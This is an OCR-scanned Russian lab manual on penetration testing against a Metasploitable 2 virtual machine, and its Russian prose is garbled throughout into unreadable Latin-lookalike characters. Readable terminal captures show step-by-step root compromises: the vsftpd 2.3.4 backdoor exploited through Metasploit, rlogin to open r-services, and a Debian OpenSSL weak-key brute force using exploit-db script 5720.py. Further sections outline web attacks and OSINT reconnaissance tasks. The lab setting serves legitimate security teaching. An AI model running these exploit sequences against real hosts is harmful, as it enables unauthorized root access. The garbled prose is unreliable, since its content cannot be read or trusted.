DiaBHaji u,ejib cymecTBOBaHMa Metasploitable 2 - noMOHb cnen,HajincTaM 
no HH^opMapnoHHOH 6e3onacHOCTH opeHHTb cboh HaBbiKH, jieranbHO 
npoBepnTb pa3JiHHHbie HHCTpyMeHTbi; noMOHb pa3pa6oTHHKaM jiynrne noHBTb 
MexaHH3M HanncaHHB 6e3onacHoro Ko^a; a Taioice aaTb B03M05KH0CTb cTyzjeHTaM 
n npeno^aBaTejMM y3HaTb 6ojibme o 6e3onacHOCTH KOHTpojinpyeMon cpe^bi. 
Metasploitable 2 npeAOCTaBjiaeT B03M0>KH0CTb nonpaiemKOBaTbca b 
3KcnjiyaTan,HH Hanbonee nonyjwpHbix ya3BHMOCTen. 

BnpTyajibHaa ManraHa Metasploitable BBjiaeTca yMbinmeHHO ya 3 BHMon 
Bepcnen BnpTyajibHon MamnHbi Ubuntu Linux, b npenycTaHOBJieHHon b Hen 
onepannoHHon cncTeMe 3apaHee OTKpbiTbi Bee nopTbi n npncyTCTByiOT Hanbonee 
H3BeCTHbie ya3BHMOCTH, HeKOTOpbie H3 KOTOpbIX BCTpenaiOTCa B peaJIbHOH 
>kh3hh Ha ^encTByioninx cncTeMax. 
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7 AEMOHCTPAUJIfl 3KCIUIYATAIJHH YB3BHMOCTEH 


/Jajiee paccMOTpem>i cnoco6bi aKcnjiyaTaiinn ya3BHMOCTen Ha npHMepe 
A,Byx cepBHCOB. 3KcnjiyaTaH,Ha aonycKaeTca b pynHOM h aBTOMaTH3HpoBaHHOM 
pe)KHMax. 

fljia aTaKH Ha cepBHC ftp BepcHH vsftpd 2.3.4 HeoSxo^HMO c noMombio 
yTHjiHTbi searchsploit h KjiiOHeBoro caoBa ocymecTBHTb noncK cymecTByiOHinx 
3KcnjiOHTOB (pHcyHOK 11). /I, a a noHCKa Taicace ^onycKaeTca Hcnojib30BaHHe 
OHjianH-6a3, TaKHx Kax exploit-db. 

Pe3yjibTaTOM noncxa BBjiaeTca ccbuiKa Ha roTOBbin 3KcnjionT npn ero 
HajIHHHH. /JjM aBTOMaTH3HpOBaHHOH 3KCnjiyaTaH,HH Heo6xOAHMO 3anyCTHTb 
«Metasploit», Ha6paB msfconsole b TepMHHajie «Kali Linux», 3 aTeM onpe^ejiHTb 
MecTonojiOHceHHe 3KcnjiOHTa c noMombio KOMaH^bi search h Bbi6paTb ero 
KOMaHflOH use (pncyHOK 12). 

root@bad: # 

root@bad: # searchsploit vsftpd 2.3.4 


Exploit Title | Path 

j (/usr/share/exploitdb/platforms/) 

vsftpd 2.3.4 - Backdoor Command Execution (Metasploit) | unix/remote/17491.rb 

root@bad: # | 

PncyHOK 11 - noncK 3KcnjiOHTOB yTHJiHTOH searchsploit 

Terminal O 0 O 

File Edit View Search Terminal Help 

A database appears to be already configured, skipping initialization 

# cowsay++ 

< metasploit > 


=[ metasploit v4.l6.7-dev ] 

+ -- --=[ 1682 exploits - 964 auxiliary - 299 post ] 

+ -- --=[ 498 payloads - 40 encoders - 10 nops ] 

+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] 

msf > search vsftpd 2.3.4 

Matching Modules 

Name Disclosure Date Rank Description 

auxiliary/gather/teamtalkcreds normal TeamTalk Gather Credentials 

explolt/unix/ftp/vsftpd 234 backdoor 2011 - 07-03 excellent vsftpd V2.3.4 Backdoor command Execution 

exploit/unix/ftp/vsftpd 234 backdoor 2011-07-03 excellent VSFTPD V2.3.4 Backdoor Command Execution 

msf > 

PncyHOK 12 - Pe3yjibTaTbi noncKa skchjiohtob 

Ilocjie BbiSopa 3KcnjionTa hco6xo,hhmo KOMaH^on options npoBepnTb 
aocTynHbie ominn ^ji a HaciponKn, 3aTeM HacTponTb o6a3aTejibHbie KOMaH^on 
set. Ilocjie OKOHnaHHB HacipoeK 3KcnjionT 3anycKaeTca KOMaH^on run (pncyHOK 

13). 
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Terminal 


e © © 


File Edit View Search Terminal Help 
msl > use exploit/unix/ftp/vsftpd 234 backdoor 
msl exploit(vsftpd_234_backdoor) > options 

Module options (exploit/unix/ftp/vsftpd 234 backdoor): 

Name Current Setting Required Description 

RHOST 10.211.50.8 yes The target address 

RPORT 21 yes The target port (TCP) 

Payload options (cmd/unix/interact): 

Name Current Setting Required Description 


Exploit target: 

Id Name 
0 Automatic 

msl exploit (vsftpd_234_backdoor) > set RHOST 10.211.55.8 
RHOST => 10.211.55.8 

msf exploit (vsftpd_234_backdoor) > run 

10.211.55.8:21 - Banner: 220 (vsFTPd 2.3.4) 

10.211.55.8:21 - USER: 331 Please specify the password. 

10.211.55.8:21 - Backdoor service has been spawned, handling... 

10.211.55.8:21 - UID: uid=0(root) gid=0(root) 

Found shell. 

Command shell session 1 opened (10.211.55.7:38245 -> 10.211.55.8:6200) at 2017-10-02 12:09:24 +0300 
wh 

whoami 

root 

uname -a 

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
id 

uid=0(root) gid=0(root) 


PncyHOK 13 - FTpoiiecc npoBepKH, HacTponKH h 3anycica 3KcnaoHTa 

/Jjia npoBepKH KOppeKTHOCTH nOJiyHCHHOH CeCCHH Heo6xOflHMO BBeCTH 
KOMaHfly uname c napaMeipoM -a. 

3KcnjiyaTau;Ha HeBepHO CKOH(j)HrypHpoBaHHbix cepBHCOB MO^ceT 

ocymecTBJiaTbca b pynHOM pe^cHMe. 3KcnjiyaTamiH HeBepHO 

CKOH(j)HrypHpoBaHHoro HaSopa r cepBHCOB, HaxoflamHxca Ha nopTax 512, 
513,514 Heo6xoAHivio BocnoabsoBaTbca HiTaTHbiMH cpe^CTBaMH, Ha6paB b 
kohcojih «Kali Linux» KoiviaH/iy rlogin h a/ipec «aTaicyeMOH» ManiHHbi. 


root@ metasploitable: - O ® O 

File Edit View Search Terminal Help 

root@bad: # rlogin 10.211.55.8 

Last login: Mon Oct 2 08:31:24 EDT 2017 from kali-debian.shared on pts/1 
Linux metasploitable 2.6.24-10-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i080 

The programs included with the Ubuntu system are free software- 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 

Ubuntu comes with ABSOLUTELY NO WARRANTY r to the extent permitted by 
applicable law. 

To access official Ubuntu documentation, pi ease visit: 
http://help.ubuntu.com/ 

You have new mail, 
root@metasploitable:uname -a 

Linux metasploitable 2.6.24-10-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i080 G 
NU/Linux 

root@metasploitable:id 

uid=0(root} gid=0(root) groups=0(root} 

root@metasploitable: 


PncyHOK 14 - ITpoBepica KOppeKTHOCTH nojiyneHHOH ceccHH 
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npOBepKH KOppeKTHOCTH nOJiyHCHHOH CeCCHH Heo6xOflHMO BBeCTH 

KOMaH^y uname c napaMeTpoM -a. 

ABTOMaTH3HpoBaHHaa 3 KcnayaTau,Ha ya3BHMOCTH Tax >Ke B03MoacHa c 
npHMeHeHHeM 3kciijiohtob, He BKjnoHeHHBix b cocTaB «Metasploit». aTaKH 
Ha ya3BHMyio Bepcnio MoayJia «OpenSSL», HcnojiB3yeMoro cepBHCOM ssh, 
HeoGxo^HMO CKanaTB apxHB c KjnonaMH rsa no cctuiKe 

https://github.com/offensive-security/exploit-database-bin- 
sploits/raw/master/bin-sploits/5622.tar.bz2 h pacnaKOBaTB ero. 3aTeM 
Heobxo^HMO CKanaTb ymjiHTy no ccbuiKe https://www.exploit- 

db.com/exploits/5720/ h 3anycTHTb ee. B xanecTBe napaMeTpoB yica3biBaK)Tca 
nyrb ao ^npeKTOpHH c rsa KmonaMH, aapec ya3BHM0H MamHHbi, nojib30BaTejib h 
nopT, Ha KOTopoM HaxoflHTca cepBHC ssh (pncyHOK 15). 


root@bad: «/Desktop O O O 

FiLe Edit View Search Terminal. Help 

root 6543 0.0 0.3 40264 3160 pts/O R+ 13:54 0:00 ps -uxa 

root/abad: Deskto # clear 

root@bad: # python 5720.py 

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org 
./exploit.py <dir> <host> <user> [[port] [threads]] 

<dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash 

<host>: The victim host 

<user>: The user of the victim host 

[port]: The SSH port of the victim host (default 22) 

[threads]: Number of threads (default 4) Too big numer is bad 
root@bad: # python 5720.py /root/Desktop/5622/rsa/2048 10.211.55.8 root 22 

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org 


Tested 

185 

keys | 

Remaining . 

32583 

keys | 

Aprox. 

Speed 37/sec 

Tested 

366 

keys | 

Remaining . 

32402 

keys | 

Aprox. 

Speed 36/sec 

Tested 

549 

keys | 

Remaining . 

32219 

keys | 

Aprox. 

Speed 36/sec 

Tested 

731 

keys | 

Remaining . 

32037 

keys | 

Aprox. 

Speed 36/sec 

Tested 

913 

keys | 

Remaining . 

31855 

keys | 

Aprox. 

Speed 36/sec 

Tested 

1096 

keys 

| Remaining 

31672 

keys 

Aprox. 

, Speed 

36/sec 

Tested 

1278 

keys 

| Remaining 

31490 

keys 

Aprox. 

Speed 

36/sec 

Tested 

1463 

keys 

| Remaining 

31305 

keys 

Aprox. 

, Speed 

37/sec 

Tested 

1644 

keys 

| Remaining 

31124 

keys 

Aprox. 

Speed 

36/sec 

Tested 

1827 

keys 

| Remaining 

30941 

keys 

Aprox. 

Speed 

36/sec 

Tested 

2011 

keys 

j Remaining 

30757 

keys 

Aprox. 

Speed 

36/sec 

Tested 

2192 

keys 

j Remaining 

30576 

keys 

Aprox. 

Speed 

36/sec 

Tested 

2367 

keys 

| Remaining 

30401 

keys 

Aprox. 

Speed 

35/sec 

Tested 

2538 

keys 

| Remaining 

30230 

keys 

Aprox. 

Speed 

34/sec 

Tested 

2707 

keys 

| Remaining 

30061 

keys 

Aprox. 

Speed 

33/sec 

Tested 

2879 

keys 

| Remaining 

29889 

keys 

Aprox. 

Speed 

34/sec 


PncyHOK 15 - IIo6op rsa Kraona nyreM 3KcnjiyaTau,HH ya3BHMOCTH 

bubjiHOTeKH OpenSSL 

Pe3yjibTaTOM BbinoaHeHHa nporpaMMbi aBaaeTca noaxoaamim kjiioh rsa. 
/laa noayneHHa aocayna k ya3BHMOH MamHHe Heobxoamvio BbinoaHMTb 
caeaymmyK) KOMaHay «ssh -l[noab30BaTeab] - p[nopT] -i [nyrb ao rsa Kaiona] 
[ip aapec]» (pHcyHOK 16). 
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root@metasploitable: ~ O 0 i 


File Edit View Search Terminal Help 


Tested 

26448 

keys 

1 

Remaining 

6320 

keys 

1 

Aprox. 

Speed 

35/sec 

Tested 

26617 

keys 

1 

Remaining 

6151 

keys 

1 

Aprox. 

Speed 

33/sec 

Tested 

26795 

keys 

1 

Remaining 

5973 

keys 

1 

Aprox. 

Speed 

35/sec 

Tested 

26970 

keys 

1 

Remaining 

5798 

keys 

1 

Aprox. 

Speed 

35/sec 

Tested 

27143 

keys 

1 

Remaining 

5625 

keys 

1 

Aprox. 

Speed 

34/sec 

Tested 

27321 

keys 

1 

Remaining 

5447 

keys 

1 

Aprox. 

Speed 

35/sec 

Tested 

27499 

keys 

1 

Remaining 

5269 

keys 

1 

Aprox. 

Speed 

35/scc 


Key Found in file: 57c3115d77c56390332dc5c49978627a-5429 

Execute: ssh -Iroot -p22 -i /root/Desktop/5622/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 10.211.55.8 
Tested 27506 keys j Remaining 5262 keys | Aprox. Speed 1/sec 

root@bad: # ssh -Iroot -p22 -i /root/Desktop/5622/rsa/2048/57c3115d77c56390332dc5c49978627a-5429 10.211.55.8 

Last login: Mon Oct 2 02:23:48 2017 from :0.O 

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 

The programs included with the Ubuntu system are free software; 
the exact distribution terms for each program are described in the 
individual files in /usr/share/doc/*/copyright. 

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by 
applicable law. 

To access official Ubuntu documentation, please visit: 
http://help.ubuntu.com/ 

You have new mail. 
root@metasploitable:~# id 
uid=0(root) gid=0(root) groups=0(root) 
root@metasploitable:~# uname -a 

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux 
root@metasploitable:~# 


PncyHOK 16 - IloflKJiiOHeHHe k yn;ajieHHOH paSoneii MaiiiHHe c 
Hcnojii>30BaHHeM o6Hapy)KeHHoro Kjnona 

/Jjia npOBepKH KOppeKTHOCTH nojiyneHHOH ceccHH HeoSxo^HMO bbccth 
KOMaH^y «uname» c napaMeTpOM «-a». 
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8 3KCIIJiyATAipra YJBBHMOCTEH B WEB-nPHJIO^CEHHBX 


npe^nojio^cHM, hto b xo^e c6opa HH(J)opMau,HH o ueaeBOM opraHHsauHH 
6bijio oGHapyaceHO BeG-npHjioaceHHe. BeG-npHjioaceHHeM MoacHO Ha 3 BaTb Bee 
hto yro^HO, rjiaBHbm npHHu,Hn — npHJioaceHHe 3anycKaeTca Ha CTOpOHe 
cepBepa, a jxjik aocTyna k HeMy Hcnojib3yeTca kjihcht. 3to MoaceT Gbitb 
flOManmaa CTpaHHHKa opraHH3au,HH, Be6-HHTep(J)eHC ana npocMOTpa 
KopnopaTHBHofi noHTbi, OHaaHH-CHCTeMa MOHHTOpHHra hjih 6pay3epHbiH naT, 
Bee 3to - BeG-npHjioaceHHa. 

B3jiom BeG-npHjioaceHHa CTaHOBHTca B 03 MoacHbiM no aeyM npHHHHaM: 

1) 3to nporpaMMHbin KOMnjieKC, KOTOpbin, KaK h jihdGoh ^pyron, MoaceT 
6bITb B3J10MaH; 

2) neM Gojibme nporpaMMHoro KO^a, TeM Bbirne BepoaTHOCTb HajiHHHa 
ohihGkh b HeM. 

OGbcmm HH^opMaijHH, c KOTOpbiMH paGoTaiOT Be6-npHJioaceHHa, BecbMa 
BejiHKH. Ha Be6-cepBepe Moryr xpaHHTbca nepcoHajibHbie flaHHbie 
nojib30BaTeaeH (KJiHeHTOB, coTpyzjHHKOB) h HH^opMapna, b tom hjih hhom BH^e 
cocTaBJiaiomaa KOMMepnecKyio hjih npo^eccnoHajibHyio TaiiHy (HanpHMep, 
(JiHHaHCOBaa HH(J)opMau,Ha hjih ejiyaceGHaa nepenncKa). 

8.1 MeaccaiiTOBbiH CKpmrriiHr (XSS) 

XSS — THn aTaKH Ha nojib30BaTejia, KOTOpbin ocymecTBJiaeTca Gjiaro^apa 
BKJHOHeHHio b OTBeTbi BeG-npHJioaceHHa KO^a 3JioyMbiuuieHHHKa. Haipe Bcero 
TaKOMy THny aTaK no/jBepaceHbi npHJioaceHHa, b kotopmx OTcyrcTByeT npoBepKa 
BBe^eHHbix nojib30BarejieM ^aHHbix. CxaaceM, npn perncTpapHH nojib30BaTejib 
MoaceT BBecra b nojie «HMa» He tojibko GyKBbi, ho h cnen,HajibHbie chmbojibi, 
TaKne Kax «N°» hjih «*», xotb b hmchh He MoaceT Gbitb cneii,HajibHbix chmbojiob. 

Hame Bcero 3JioyMbmuieHHHKH Hcnojib3yiOT JavaScript hjih Flash, ho 
yHHTbiBaa pa3HOo6pa3ne noAnepacHBaeMbix 6pay3epoM tcxhohothh, 3to MoaceT 
GbiTb hto yroaHO. CaMbiMH nacTbiMH u,ejiaMH TaKoro THna aTaK aBjiaiOTca: 

• Kpaaca cookie-(J)aHjia nojib30BaTejia, B3aHMOfl,eiicTBHe c nepe^aBaeMoii bo 
BpeMa ceccHH HHcjiopMaLtfieH, a TaKace nepeHanpaBJieHne nojib30BaTejia Ha 
flpyroH cam:. npn noMomn XSS MoacHO yKpacTb cookie-(j)aHJi. ^Jia stoto 
noHa^oGaTca: ya3BHMaa (jiopMa H yrajiHTa netcat, no3BOJiaiomaa 
B3aHMOfleHCTBOBaTb B HHTepaKTHBHOM peaCHMe C JIIoGblM CeTeBbIM 
eepBHCOM (MoaceT BbiCTynaTb KaK b pojin cepBepa, TaK h b pojin KJineHTa); 

• nepeHanpaBjieHHe 6pay3epa - tbkhm o6pa30M MoacHO 3acTaBHTb 
nojibsoBaTejia CKanaTb (jiaHji. Kor^a nojib30Barejib 3 aiiaeT Ha 
CKOMnpOMeTHpOBaHHyio CTpaHHH,y, 6pay3ep aBTOMaTHnecKH npe^jioacHT 
eMy CKanaTb yKa3aHHbra (jianji. 
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8.2 BKJiiOHeHiie jioicajibHbix hjih yaajieHHbix (|)aii.riOB 


RFI (Remote File Inclusion) - 3to BbinojiHemie yAajieHHbix (JmiijiOB Ha 
CepBepHOH CTOpOHe, HHbIMH CJIOBaMH 3TO eepBep, BO r 3BpamaK)UJHH C KaKHM-TO 
3anpocoM xoa nporpaMMBi, KOTOpbiii 6y^eT otkpbit h 3anymeH Ha cepBepe- 
yfcepTBe. 3anacTyK) H3-3a nnoxo HanHcaHHoro xoAa h HexoppexTHO 
CKOH(J)HrypHpoBaHHoro Be6-cepBepa noaBjineTca bo3mo5xhoctb BKjnoHaTE. 
AaHHbie H3 noKajibHoro hjih HaxoAaiuerocn Ha y^ajieHHOM cepBepe cjianjia b 
HcnojmaeMbiH xoa. 

8.3 SQL-HHbeKijHH 

SQL-HHbexpHH npeflCTaBJiaiOT co6oh oahh h3 caMbix HHTepecHbix, 
ejio^CHbix h MomHbix bh/job aTax. /Jjia hx peajiH3aii,HH Tpe6yiOTca xopomne 
3HaHHa 6a3 jiaHHbix, caMoro SQL h Be6-nporpaMMHpoBaHHfl. Ecjih AaHHbie 
nepeA OTnpaBXoii Ha eepBep He npoxoA^T aoji>khoh npOBepxn, to cymecTByeT 
B03M0»CH0CTb npoBeAeHiia aTaxH ^aHHoro THna. SQL-HH'bexu.HH — sto aTaxn Ha 
Be6-npHjio^ceHHa, Hcnojib3yioiH,He Ana CBoeii pa6oTbi 6a3bi a^hhbix. ATaxn, no 
cyra, npeACTaBjiaiOT co6oii BHeApemie xoAa b cymecTByiomHH 3anpoc c uejibio 
nojiyneHHB AOCTyna x AaHHbiM hjih MaHHnyjiHpoBaHHB hmh. EjiaroAapa 
noBceMecTHOH paenpocTpaHeHHOCTH SQL aTaxn stoto rana paSoTaiOT 
npaxTHuecxH Ha Bcex njiaTcJiopMax. 

8.4 Command Injection 

KoMaHAHaa HHbexijHB - 3to aTaxa, TAe uejibio BBjiaeTcn BbinojiHeHHe 
npoH3BOJibHbix xomaha b onepauHOHHoii CHCTeMe cepBepa nepe3 yB3BHMoe 
npHjioaceHHe. ATaxn c noMombio xoMaHAHoii HHT>exi],HH B03M0>KHbi, xorAa Be6- 
npHJioaceHHe npHHHMaeT He6e3onacHbie nojib30BaTejibcxHe AaHHbie (cJiopMbi, 
cookie, 3arojiOBXH HTTP h t. a.) b CHCTeMHyio o6ojionxy. B stoh aTaxe xomahabi 
onepapHOHHoii CHCTeMbi npeAOCTaBJiaeMbie aTaxyioinHM oSmhho BbinojimnoTca 
c npHBHJieraaMH ya3BHMoro npHJioaceHHa. ATaxn xoMaHAHoro BHeApeHna 
B03M0aCHbI BO MHOTOM H3-3a HeAOCTaTOHHOH npOBepXH BXOAHbIX AaHHbIX. 

8.5 CSRF 

CSRF (aHTJi. Cross Site Request Forgery — «Me>xcaHTOBaa noAACJixa 
3anpoca», Taxace H3BecTHa xax XSRF) — bha aTax Ha noceTHTejieii BeS-caixroB, 
Hcnojib3yioii];HH HeAOCTaTXH npOTOxojia HTTP. Ecjih acepTBa 3axoAHT Ha cainy 
co3AaHHbiii 3JioyMbimjieHHHxoM, ot ee jihua TaiiHO OTnpaBJiaeTca 3anpoc Ha 
Apyroii eepBep (HanpHMep, Ha eepBep njiaTeacHoii CHCTeMbi), ocymecTBJiaioinHH 
Hexyio BpeAOHOCHyio onepapmo (HanpHMep, nepeBOA AGHer Ha cuer 
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3JioyMbimjieHHHKa). ^jia ocymecTBjieHKa /jaHHOH aTaKH ^cepTBa ^oji^cHa 6bitb 
ayTeHTH(J)HLi,HpoBaHa Ha tom cepBepe, Ha KOTOpbin OTnpaBjiaeTca 3anpoc, h stot 
3anpoc He flOJDKeH Tpe6oBaTb KaKoro-jinSo noflTBep^eHHa co CTOpOHbi 
nojib30BaTejia, KOTOpoe He Mo^ceT 6biTb npoHTHopHpoBaHO hjih noflflejiaHO 
aTaKyiOH],HM CKpHnTOM. 
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JIAEOPATOPHAfl PABOTA JVsl 


U,ejib jia6opaTopHoii pa6oTbi: nojiyneHne npaKTHHecKHx HaBbiKOB 
TecrapoBaHHa Ha npoHHKHOBeHHe b nacTH HHTepHeT-pa3Be,zi,KH b paMKax 
H3yneHHa ^HcpHnjiHHbi «TexHOJiorHa cepra^HKapHH cpe^CTB 3aiu;HTbi 
HH^)OpMaLi:HH». 

3a^aHHe Ha jia6opaTopHyio pa6oTy: 

1. Bbi6paTb opraHHsauHK), o KOTopoii 6yo,eT co6npaTbca HH(|)opMauHa; 

2. Onpe^ejiHTb npaBHjia (J)opMHpoBaHHa noHTOBbix yneTHbix 3annceH b 
opraHH3au,HH; 

3. Hcnonb3ya cneijHajibHbie onepaTOpbi hohckobhkob HaiiTH ^OKyMeHTbi 
c pacmnpeHHeM PDF Ha ^OMeHe opraHH3apHH; 

4. HaiiTH HeHH^eKCHpyeMbie URLs b fjjaiijie robots.txt Ha flOMeHe 
opraHH3au;HH; 

5. Hcnonb3ya cepBHC (waybackmachine.org) nocMOTpeTb 
K3mHpOBaHHbie KonHH caHTa opraHH3apHH; 

6. OnpeflejiHTb ^,Hana30H cera, b KOTopbiH bxo^ht IP-a^pec caiiTa h 
HH^) opMan,HK) o aomchc c noMombio yTHjiHTbi whois; 

7. Hairm cybflOMeHbi ocHOBHoro ^OMCHa opraHH3an,HH h 03HaK0MHTca c 
HX COAep>KHMbIM. 
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JIAEOPATOPH Afl PAEOTA JM»2 


Ifejib jia6opaTopHoii pa6oTbi: nojiyneHne npaKranecKHX HaBbiKOB 
TecTHpoBaHHa Ha npoHHKHOBeHHe b nacra 3KcnjiyaTai],HH yn3BHMOCTeii b paMKax 
H3yneHHa flHcpHmiHHbi «TexHOJiorHa cepracjiHKapHH epe^CTB 3aiu;HTbi 
HH(j)OpMau;HH». 

//jin BbinojiHeHHa jioSapHoii paSoTbi Heo6xoAHMbi: 

1. Cpe^CTBO BHpTyajiH3au,HH - VirtualBox; 

2. 06pa3 BHpTyajibHoii ManiHHbi fljw HCCJie^OBaHHa - Metasploitable2; 

3. 06pa3 BHpTyajibHoii ManiHHbi aTaicyiomero - Kali Linux. 

Ilo,zi,roTOBKa k BbinojiHeHHK) jiabopaTopHoii paboTbi: 

1) //jin BbinojiHeHHa jiabopaTOpHoii paboTbi Heo6xo,a;HMO pa3BepHyTb 
HH(j)pacTpyKTypy. //jin 3Toro Hy^cHO oxanara h ycTaHOBHTb cpe^y 
BnpTyajiH3auHH. KjiaccHnecKHM pemeHHeM nBJiaeTca Oracle VM VirtualBox 
(https://www.virtualbox.org/), o/jHaKO ^onycKaeTca Hcnojib30BaHHe aHanoroB. 

2) YcTaHaBJiHBaeM BHpTyajibHyio ManiHHbi «^epTBbi». B naHHoh 
jiabopaTOpHoii paboTe 3 to Metasploitable2 (Linux), conep>KamHH Habop 
ya3BHMbix npHjio'/KeHHH. /bn a ycTaHOBKH HeobxojiHMO oxanara (jjaiiji 
https://sourceforge.net/projects/metasploitable/ . BHyrpH zip-apxHBa coAepacHTca 
(jiaiiji c pacnmpeHHeM «vmdk» (Virtual Machine Disk), coAep'/KauiuH obpa3 
Metasploitable2. 

3) /(ajiee b cpe^e BHpTyajiH3apHH HeobxoflHMO co3^aTb HOByio 
BHpTyajibHyio MamHHy, BbibpaB ran «Linux», Bepcmo «Linux 2.6/3.x/4.x(64- 
bit)», yxa3aB b xanecTBe xcecTKoro jmcxa CKaneHHbiH paHee vmdk cjnairjr. 

4) /],jia ycTaHOBKH BHpTyajibHoii MamHHbi «aTaKyioii];ero» Heobxo,zi;HMO no 
ccbuixe https://www.kali.org/downloads/ CKanara iso (Jiairji c (JmHajibHoii 
BepcHeii flHCTpHbyraBa Kali Linux. 

5) //ajiee C03^aeM HOByio BHpTyajibHyio MamHHy, BbibpaB ran «Linux», 
Bepcmo «Linux 2.6/3.x/4.x(64-bit)». Ilocjie toto Rax BHpTyajibHaa ManiHHa 
bygeT co3^aHa, Heobxo,gHMO Bbibpara ee b cnncKe cboxy h orapbira MeHio 
HacTpoex. 

6) Bo BKjia^Ke «HocHTejiH» HeobxogMMO Bbibpara «KoHTpojiep: IDE» h 
no6aBHTb HOBbiii 3K3eMnjiap, yxa3aB b Kanecrae ncTOHHHKa CKaneHHbiH iso o6pa3 
(pncyHOK 17). 
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3 - Hocme/iM 


B 




a 


Otiiuiie Cwcrewa Awcnnefl hocmtcjim Ayawo Cerb noprbi oc-mMe nanscn nmep^eflc nojibaosaiejiifl 

Hoc menu MH^oph Bbi coSkipaeTecb Ao 6 aBHTb HOBbiti npwsoA 

onTWHecKwx awckob k KQHTpo/uiepy IDE, 


<& KoHTpo/uiep: 

© IlycTO 
^ KoHTpo/uiep: 
H 3.vdl 


/ 


Xe/iaeTe BbitfpaTb o 6 paa onTWHecicoro flMCKa ti 
notviecTHTb eroaftaHHbiw npuBOA nnn ocTasuTb 
npuBOA nycTbiivs? 


OTMewa 


Bbi6paTb e>6paa 


OdaBHTb nyCTbIM 


© □ <& 

OiMeHa OK 


PncyHOK 17 - HacTpoiiKa BHpTyajibHOH MamnHbi 


7) A- 113 3aBepmeHHa HacTponKn HH(J)pacTpyKTypbi hco6xoahmo 

CKOH(j)HrypHpOBaTB CeTB TaKHM o6pa30M, HTOSbl BHpTyaJIBHBie ManiHHBi BH^eJIH 
flpyr flpyra. J^jih 3Toro bo BKJia^Ke «CeTb» HacTpoeK (cm. npeflbmymnn 3Tan) 
r jia Ka^c^OH BHpTyanbHOH MamnHbi HeoGxo^HMO Bbi6paTb ran no^KmoneHna 
«NAT» (Network Adress Translation — MexaHH3M b cerax, nocTpoeHHbix c 
ncnojib30BaHneM TCP/IP npOTOKOJia, npeo6pa3yiomHH IP-a^peca TpaH3nrabix 
naxeTOB). (pncyHOK 18). 



OtilitMe CHCTSMfl 



AHcnnefl Hqcmtcjim 


A^anTep 1 


3 - CeTb 
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Aflamep 2 



0 a 


rioprbi comma nanKKi Mmep^eflc nonbaoBaTenn 
Mamep 3 AAamep 4 


G BicmoHUTb ceTesow aftanrep 


Tun noflKn iq h g hm s : 


NAT 


H'ms: 


I> flonOAHMTSAbHO 


OTMSHia 


ox 


PncyHOK 18 - HacTpoiiKa BHpTyanbHOH cera MOK^y BnpTyanbHbiMn 

MaUIHHaMH 


33 









































8) ^anee hcoOxoahmo npoBepHTb KoppeKraocTb HacTpoeK. C noMombio 
KOMaH^bi «ifconfig» y3HaiiTe IP-a^peca, noayHeHHbie BnpTyajibHbiMH 
MamraaMH, a 3aTeM c noMonjbio KOMaH^bi «ping» npOBepbTe coe^HHemie 
(pncyHOK 19-21). 

rootg&bad:~ 0 @ © 


File Edit View Search Terminal Help 

root@bad : # ifconfig 

ethO: flags=4163<UP r BROADCAST,RUNNING,MULTICAST> mtu 1500 

inet 10,211,55.7 netmask 255.255.255,0 broadcast 10.211.55.255 
inet6 fe80::21c:42ff:fe23:ecd5 prefixlen 64 scopeid 0x20<link> 
inet6 fdb2:2c26:f4e4:0:21c:42ff:fe23:ecd5 prefixlen 64 scopeid OxO<glo 

bal> 

inet6 fdb2:2c26:f4e4:O:lcl9:b4e8:7196:fe90 prefixlen 64 scopeid OxO<gl 

obal> 

ether 00:lc:42:23:ec:d5 txqueuelen 1000 (Ethernet) 

RX packets 88 bytes 9040 (8.8 KiB) 

RX errors 0 dropped 0 overruns 0 frame O 
TX packets 43 bytes 3792 (3.7 KiB) 

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536 
inet 127.0.0.1 netmask 255.0.0.0 
inet6 ::1 prefixlen 128 scopeid OxlO<host> 
loop txqueuelen 1000 (Local Loopback) 

RX packets 216 bytes 16236 (15.8 KiB) 

RX errors 0 dropped 0 overruns 0 frame 0 
TX packets 216 bytes 16236 (15,8 KiB) 

TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 


PncyHOK 19 - IlpOBepKa ceTeBbix HacTpoeK ManiHHbi aTaxyiomero 


test [Running] 


isf adm inPmetasploitable: 

isf adm inPmetasploitable:™$ 

isfadminPmetasploitable:™$ ifconfig 

ithO Link encap:Ethernet HUaddr 08:00:27:40:65:26 

inet addr : 10.211.55.8 Beast:10.211.55.255 Mask : 255.255.255.0 
inet6 addr: fdb2:2c26:f4e4:0:aOO:27ff:fe40:6526/64 Scope:Global 
inet6 addr: fe80 : :a00:27ff:fe40:6526/64 Scope :Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric :1 
RX packets:181588 errors:0 dropped:© ouerruns:© frame:0 
TX packets:181066 errors:© dropped:© ouerruns:© carrier:© 
collisions:© txqueuelen:1000 

RX bytes=13149485 (12.5 MB) TX bytes:9981573 (9.5 MB) 

Base address : OxdOlO Memory:fOOOOOOO-f0020000 

Lo Link encap:Local Loopback 

inet addr = 127.0.0.1 Mask : 255.0.0.0 

inet6 addr: :: 1/128 Scope:Host 

UP LOOPBACK RUNNING MTU=16436 Metric=1 

RX packets: 1893 errors:© dropped:© ouerruns = 0 frame = 0 

TX packets:1893 errors:© dropped:© ouerruns:© carrier:© 

collisions:© txqueuelen:© 

RX bytes=920849 (899.2 KB) TX bytes=920849 (899.2 KB) 
isf adminOmetasploitable:™$ 

isfadminOmetasploitable:~§ __ 


PncyHOK 20 - IlpOBepKa ceTeBbix HacTpoeK Hccae^yeMOH Ma ni HHbi 
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root@)bad: - 


o © o 


File Edit View Search Terminal Help 

